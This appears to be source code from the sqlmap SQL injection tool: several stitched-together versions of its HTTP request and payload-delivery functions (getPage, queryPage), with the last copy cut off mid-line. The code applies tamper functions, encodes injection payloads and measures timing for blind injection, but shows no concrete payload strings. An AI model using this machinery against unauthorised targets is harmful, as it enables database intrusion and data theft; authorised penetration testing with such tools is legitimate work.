def getPage(**kwargs): """ This method connects to the target URL or proxy and returns the target URL page content """ if isinstance(conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) if conf.dummy: return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt()) threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter url = kwargs.get("url", None) or conf.url get = kwargs.get("get", None) post = kwargs.get("post", None) method = kwargs.get("method", None) cookie = kwargs.get("cookie", None) ua = kwargs.get("ua", None) or conf.agent referer = kwargs.get("referer", None) or conf.referer host = kwargs.get("host", None) or conf.host direct_ = kwargs.get("direct", False) multipart = kwargs.get("multipart", False) silent = kwargs.get("silent", False) raise404 = kwargs.get("raise404", True) timeout = kwargs.get("timeout", None) or conf.timeout auxHeaders = kwargs.get("auxHeaders", None) response = kwargs.get("response", False) ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout refreshing = kwargs.get("refreshing", False) retrying = kwargs.get("retrying", False) crawling = kwargs.get("crawling", False) skipRead = kwargs.get("skipRead", False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") conn = None code = None page = None _ = urlparse.urlsplit(url) requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) try: socket.setdefaulttimeout(timeout) if direct_: if '?' 
in url: url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect._connReadProxy(conn) if not skipRead else None responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if conf.forceSSL and urlparse.urlparse(url).scheme != "https": url = re.sub("\Ahttp:", "https:", url, re.I) url = re.sub(":80/", ":443/", url, re.I) if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if not conf.skipUrlEncode: get = urlencode(get, limit=True) if get: if '?' in url: url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) else: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: host}) if kb.authHeader: headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader if HTTP_HEADER.ACCEPT not in headers: headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE if HTTP_HEADER.HOST not in headers: headers[HTTP_HEADER.HOST] = getHostHeader(url) if HTTP_HEADER.ACCEPT_ENCODING not in headers: headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers: headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: warnMsg = "missing 'boundary parameter' in '%s' header. 
" % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) if auxHeaders: for key, item in auxHeaders.items(): for _ in headers.keys(): if _.upper() == key.upper(): del headers[_] headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) url = unicodeencode(url) post = unicodeencode(post, kb.pageEncoding) if method and method not in (HTTPMETHOD.GET, HTTPMETHOD.POST): method = unicodeencode(method) req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post is not None: if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTP_HEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post is not None: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and (conf.authType or "").lower() == AUTH_TYPE.BASIC.lower(): kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 'redurl'): page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect._connReadProxy(conn)) if not skipRead else None skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect._connReadProxy(conn) if not skipRead else None code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? 
[Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect._getPageProxy(**kwargs) except SqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occurred during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() if not skipRead else None responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code kb.originalCode = kb.originalCode or code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED and not conf.ignore401: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise SqlmapConnectionException(errMsg) elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise SqlmapConnectionException(errMsg) else: debugMsg = "page not found (%d)" % code singleTimeLogMessage(debugMsg, logging.DEBUG) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect._retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise SqlmapConnectionException(warnMsg) else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place in (PLACE.GET, PLACE.POST, PLACE.URI, PLACE.CUSTOM_POST): # payloads in GET and/or POST need to be urlencoded # thoroughly without safe chars (especially & and =) # addendum: as we support url encoding in tampering # functions, we need to use % as a safe char if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)): payload = urlencode(payload, '%', False, True) if place not in (PLACE.POST, PLACE.CUSTOM_POST) and conf.skipUrlEncode else payload value = agent.replacePayload(value, payload) elif place == PLACE.SOAP: # payloads in SOAP should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace('>', "&gt;").replace('<', "&lt;") value = agent.replacePayload(value, payload) if place: value = agent.removePayloadDelimiters(value) if place == PLACE.COOKIE and conf.cookieUrlencode: value = urlEncodeCookieValues(value) if conf.checkPayload: checkPayload(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value if PLACE.SOAP in conf.parameters: post = conf.parameters[PLACE.SOAP] if place != PLACE.SOAP or not value else value if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.UA in conf.parameters: ua = conf.parameters[PLACE.UA] if place != PLACE.UA or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in [PLACE.GET, PLACE.POST, PLACE.COOKIE]: if item in conf.parameters: if
item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.pDel or "&" variables = {} originals = {} for item in filter(None, (get, post)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) evaluateCode("%s='%s'" % (name, value), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): value = unicode(value) if '%s=' % name in (get or ""): get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get) elif '%s=' % name in (post or ""): post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post) elif post: post += "%s%s=%s" % (delimiter, name, value) else: get += "%s%s=%s" % (delimiter, name, value) get = urlencode(get, limit=True) if post and place not in (PLACE.POST, PLACE.SOAP, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif not conf.skipUrlEncode and place not in (PLACE.SOAP,): post = urlencode(post) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = False warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. 
" warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(r"max.+connections", page or "", re.I) is not None kb.permissionFlag = re.search(r"(command|permission|access)\s*(was|is)?\s*denied", page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
def getPage(**kwargs): """ This method connects to the target url or proxy and returns the target url page content """ if conf.delay is not None and isinstance( conf.delay, (int, float)) and conf.delay > 0: time.sleep(conf.delay) elif conf.cpuThrottle: cpuThrottle(conf.cpuThrottle) threadData = getCurrentThreadData() threadData.lastRequestUID += 1 url = kwargs.get('url', conf.url) get = kwargs.get('get', None) post = kwargs.get('post', None) method = kwargs.get('method', None) cookie = kwargs.get('cookie', None) ua = kwargs.get('ua', None) referer = kwargs.get('referer', None) host = kwargs.get('host', conf.host) direct = kwargs.get('direct', False) multipart = kwargs.get('multipart', False) silent = kwargs.get('silent', False) raise404 = kwargs.get('raise404', True) auxHeaders = kwargs.get('auxHeaders', None) response = kwargs.get('response', False) ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) refreshing = kwargs.get('refreshing', False) retrying = kwargs.get('retrying', False) crawling = kwargs.get('crawling', False) if not urlparse.urlsplit(url).netloc: url = urlparse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host target = reduce( lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) if not retrying: # Reset the number of connection retries threadData.retriesCount = 0 # fix for known issue when urllib2 just skips the other part of provided # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") code = None page = None requestMsg = u"HTTP request [#%d]:\n%s " % ( threadData.lastRequestUID, method or (HTTPMETHOD.POST if post else HTTPMETHOD.GET)) requestMsg += ("%s" % urlparse.urlsplit(url)[2] or "/") if not any( (refreshing, crawling)) else url responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None logHeaders = u"" skipLogTraffic = False raise404 = raise404 and not kb.ignoreNotFound # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't # support those by default url = asciifyUrl(url) # fix for known issues when using url in unicode format # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) url = unicodeencode(url) try: if silent: socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) else: socket.setdefaulttimeout(conf.timeout) if direct: if "?" 
in url: url, params = url.split("?") params = urlencode(params) url = "%s?%s" % (url, params) requestMsg += "?%s" % params elif multipart: # Needed in this form because of potential circle dependency # problem (option -> update -> connect -> option) from lib.core.option import proxyHandler multipartOpener = urllib2.build_opener( proxyHandler, multipartpost.MultipartPostHandler) conn = multipartOpener.open(unicodeencode(url), multipart) page = Connect.__connReadProxy(conn) responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) return page elif any((refreshing, crawling)): pass elif target: if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] if get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get if conf.method == HTTPMETHOD.POST and not post: for place in (PLACE.POST, PLACE.SOAP): if place in conf.parameters: post = conf.parameters[place] break elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str # Prepare HTTP headers headers = forgeHeaders({ HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer }) if kb.authHeader: headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE headers[ HTTPHEADER. ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if method != HTTPMETHOD.HEAD else "identity" headers[HTTPHEADER.HOST] = host or getHostHeader(url) if auxHeaders: for key, item in auxHeaders.items(): headers[key] = item for key, item in headers.items(): del headers[key] headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode( item, kb.pageEncoding) post = unicodeencode(post, kb.pageEncoding) if method: req = MethodRequest(url, post, headers) req.set_method(method) else: req = urllib2.Request(url, post, headers) requestHeaders += "\n".join( "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items()) if not getRequestHeader(req, HTTPHEADER.COOKIE) and conf.cj: conf.cj._policy._now = conf.cj._now = int(time.time()) cookies = conf.cj._cookies_for_request(req) requestHeaders += "\n%s" % ("Cookie: %s" % ";".join( "%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies)) if post: if not getRequestHeader(req, HTTPHEADER.CONTENT_TYPE): requestHeaders += "\n%s: %s" % ( string.capwords(HTTPHEADER.CONTENT_TYPE), "application/x-www-form-urlencoded") if not getRequestHeader(req, HTTPHEADER.CONTENT_LENGTH): requestHeaders += "\n%s: %d" % (string.capwords( HTTPHEADER.CONTENT_LENGTH), len(post)) if not getRequestHeader(req, HTTPHEADER.CONNECTION): requestHeaders += "\n%s: close" % HTTPHEADER.CONNECTION requestMsg += "\n%s" % requestHeaders if post: requestMsg += "\n\n%s" % getUnicode(post) requestMsg += "\n" threadData.lastRequestMsg = requestMsg logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg) conn = urllib2.urlopen(req) if not kb.authHeader and getRequestHeader( req, HTTPHEADER.AUTHORIZATION): kb.authHeader = getRequestHeader(req, HTTPHEADER.AUTHORIZATION) if not kb.proxyAuthHeader and getRequestHeader( req, HTTPHEADER.PROXY_AUTHORIZATION): kb.proxyAuthHeader = getRequestHeader( req, HTTPHEADER.PROXY_AUTHORIZATION) # Return response object if response: return conn, None, None # Get HTTP response if hasattr(conn, 
'redurl'): page = threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO\ else Connect.__connReadProxy(conn) skipLogTraffic = kb.redirectChoice == REDIRECTION.NO code = conn.redcode else: page = Connect.__connReadProxy(conn) code = code or conn.code responseHeaders = conn.info() responseHeaders[URI_HTTP_HEADER] = conn.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) status = getUnicode(conn.msg) if extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) and not refreshing: url = extractRegexResult(META_REFRESH_REGEX, page, re.DOTALL | re.IGNORECASE) debugMsg = "got HTML meta refresh header" logger.debug(debugMsg) if kb.alwaysRefresh is None: msg = "sqlmap got a refresh request " msg += "(redirect like response common to login pages). " msg += "Do you want to apply the refresh " msg += "from now on (or stay on the original page)? [Y/n]" choice = readInput(msg, default="Y") kb.alwaysRefresh = choice not in ("n", "N") if kb.alwaysRefresh: if url.lower().startswith('http://'): kwargs['url'] = url else: kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url threadData.lastRedirectMsg = (threadData.lastRequestUID, page) kwargs['refreshing'] = True kwargs['get'] = None kwargs['post'] = None try: return Connect.__getPageProxy(**kwargs) except sqlmapSyntaxException: pass # Explicit closing of connection object if not conf.keepAlive: try: if hasattr(conn.fp, '_sock'): conn.fp._sock.close() conn.close() except Exception, msg: warnMsg = "problem occured during connection closing ('%s')" % msg logger.warn(warnMsg) except urllib2.HTTPError, e: page = None responseHeaders = None try: page = e.read() responseHeaders = e.info() responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage( page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None, None except KeyboardInterrupt: raise except: pass finally: page = page if isinstance(page, unicode) else getUnicode(page) code = e.code threadData.lastHTTPError = (threadData.lastRequestUID, code) kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1 status = getUnicode(e.msg) responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status) if responseHeaders: logHeaders = "\n".join( "%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in responseHeaders.items()) logHTTPTraffic( requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])) skipLogTraffic = True if conf.verbose <= 5: responseMsg += getUnicode(logHeaders) elif conf.verbose > 5: responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]) logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg) if e.code == httplib.UNAUTHORIZED: errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == httplib.NOT_FOUND: if raise404: errMsg = "page not found (%d)" % code raise sqlmapConnectionException, errMsg else: debugMsg = "page not found (%d)" % code logger.debug(debugMsg) processResponse(page, responseHeaders) elif e.code == httplib.GATEWAY_TIMEOUT: if ignoreTimeout: return None, None, None else: warnMsg = "unable to connect to the target url (%d - %s)" % ( 
e.code, httplib.responses[e.code]) if threadData.retriesCount < conf.retries and not kb.threadException: warnMsg += ". sqlmap is going to retry the request" logger.critical(warnMsg) return Connect.__retryProxy(**kwargs) elif kb.testMode: logger.critical(warnMsg) return None, None, None else: raise sqlmapConnectionException, warnMsg else: debugMsg = "got HTTP error code: %d (%s)" % (code, status) logger.debug(debugMsg)
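# Both getPage variants above chase HTML meta refresh "redirects" by pulling
# the target out of the page with META_REFRESH_REGEX. The real pattern lives in
# sqlmap's settings; the approximation below only illustrates the shape of the
# match and is an assumption, not the actual constant:

import re

META_REFRESH_SKETCH = re.compile(r"<meta\s[^>]*http-equiv=[\"']?refresh[\"']?[^>]*"
                                 r"content=[\"']?\d+;\s*url=(?P<url>[^\"'>]+)", re.I | re.S)

def refresh_target(page):
    match = META_REFRESH_SKETCH.search(page or "")
    return match.group("url") if match else None

# e.g. refresh_target('<meta http-equiv="refresh" content="0;url=/login">')
# returns '/login'; relative targets are then joined with conf.url, just as the
# kb.alwaysRefresh branch above does.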
def queryPage( value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True, ): """ This method calls a function to get the target URL page content and returns its page MD5 hash or a boolean value in case of string match check ('--string' command line parameter) """ if conf.direct: return direct(value, content) get = None post = None cookie = None ua = None referer = None host = None page = None pageLength = None uri = None code = None if not place: place = kb.injection.place or PLACE.GET if not auxHeaders: auxHeaders = {} raise404 = place != PLACE.URI if raise404 is None else raise404 value = agent.adjustLateValues(value) payload = agent.extractPayload(value) threadData = getCurrentThreadData() if conf.httpHeaders: headers = dict(conf.httpHeaders) contentType = max( headers[_] if _.upper() == HTTP_HEADER.CONTENT_TYPE.upper() else None for _ in headers.keys() ) if (kb.postHint or conf.skipUrlEncode) and kb.postUrlEncode: kb.postUrlEncode = False conf.httpHeaders = [_ for _ in conf.httpHeaders if _[1] != contentType] contentType = POST_HINT_CONTENT_TYPES.get(kb.postHint, PLAIN_TEXT_CONTENT_TYPE) conf.httpHeaders.append((HTTP_HEADER.CONTENT_TYPE, contentType)) if payload: if kb.tamperFunctions: for function in kb.tamperFunctions: payload = function(payload=payload, headers=auxHeaders) if not isinstance(payload, basestring): errMsg = "tamper function '%s' returns " % function.func_name errMsg += "invalid payload type ('%s')" % type(payload) raise SqlmapValueException(errMsg) value = agent.replacePayload(value, payload) logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload)) if place == PLACE.CUSTOM_POST and kb.postHint: if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML): # payloads in SOAP/XML should have chars > and < replaced # with their HTML encoded counterparts payload = payload.replace(">", "&gt;").replace("<", "&lt;") elif kb.postHint == POST_HINT.JSON: if payload.startswith('"') and payload.endswith('"'): payload = json.dumps(payload[1:-1]) else: payload = json.dumps(payload)[1:-1] elif kb.postHint == POST_HINT.JSON_LIKE: payload = ( payload.replace("'", REPLACEMENT_MARKER).replace('"', "'").replace(REPLACEMENT_MARKER, '"') ) if payload.startswith('"') and 